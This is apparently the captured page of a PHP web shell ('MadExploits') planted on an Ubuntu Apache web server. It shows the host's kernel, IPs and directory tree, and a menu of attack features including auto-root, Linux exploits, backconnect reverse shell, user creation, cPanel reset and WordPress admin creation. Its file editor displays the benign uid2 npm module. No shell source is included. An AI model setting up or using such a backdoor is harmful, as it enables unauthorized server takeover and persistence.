Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
greenpreneurs /
node_modules /
uid2 /
[ HOME SHELL ]
Name
Size
Permission
Action
HISTORY.md
605
B
-rw-r--r--
LICENSE
1.05
KB
-rw-r--r--
README.md
432
B
-rw-r--r--
index.js
1.04
KB
-rw-r--r--
package.json
223
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.js
/** * Module dependencies */ var crypto = require('crypto'); /** * 62 characters in the ascii range that can be used in URLs without special * encoding. */ var UIDCHARS = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'; /** * Make a Buffer into a string ready for use in URLs * * @param {String} bytes a Buffer containing the bytes to convert * @returns {String} UID * @api private */ function tostr(bytes) { var r, i; r = []; for (i = 0; i < bytes.length; i++) { r.push(UIDCHARS[bytes[i] % UIDCHARS.length]); } return r.join(''); } /** * Generate an Unique Id * * @param {Number} length The number of chars of the uid * @param {Number} cb (optional) Callback for async uid generation * @api public */ function uid(length, cb) { if (typeof cb === 'undefined') { return tostr(crypto.pseudoRandomBytes(length)); } else { crypto.pseudoRandomBytes(length, function(err, bytes) { if (err) return cb(err); cb(null, tostr(bytes)); }) } } /** * Exports */ module.exports = uid;
Close